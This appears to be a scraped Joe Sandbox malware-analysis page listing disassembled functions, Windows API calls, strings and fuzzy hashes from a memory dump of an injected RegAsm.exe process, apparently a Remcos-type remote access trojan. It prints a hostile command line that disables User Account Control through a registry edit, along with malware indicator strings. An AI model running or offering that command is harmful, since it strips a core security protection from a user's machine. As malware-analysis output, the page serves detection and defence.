                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                • API String ID: 2922976086-4183131282
                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                Function 0040729B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                Download Yara Rule
                                                Strings
                                                • Rmc-GT4655, xrefs: 00407715
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-GT4655
                                                • API String ID: 0-325934808
                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                • String ID: KeepAlive | Disabled
                                                • API String ID: 2993684571-305739064
                                                • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                • String ID: Alarm triggered
                                                • API String ID: 614609389-2816303416
                                                • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                Strings
                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                • API String ID: 3024135584-2418719853
                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                • _free.LIBCMT ref: 0044943D
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00449609
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                • String ID:
                                                • API String ID: 1286116820-0
                                                • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                  • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 2180151492-0
                                                • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                • __alloca_probe_16.LIBCMT ref: 00451231
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                • __freea.LIBCMT ref: 0045129D
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                • String ID:
                                                • API String ID: 313313983-0
                                                • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                • _free.LIBCMT ref: 100071B8
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                • _free.LIBCMT ref: 0044F43F
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                • _free.LIBCMT ref: 10005BB4
                                                • _free.LIBCMT ref: 10005BDB
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                • _free.LIBCMT ref: 00448353
                                                • _free.LIBCMT ref: 0044837A
                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: lstrlen$lstrcat
                                                • String ID:
                                                • API String ID: 493641738-0
                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 100091D0
                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                • _free.LIBCMT ref: 100091E2
                                                • _free.LIBCMT ref: 100091F4
                                                • _free.LIBCMT ref: 10009206
                                                • _free.LIBCMT ref: 10009218
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00450A54
                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                • _free.LIBCMT ref: 00450A66
                                                • _free.LIBCMT ref: 00450A78
                                                • _free.LIBCMT ref: 00450A8A
                                                • _free.LIBCMT ref: 00450A9C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
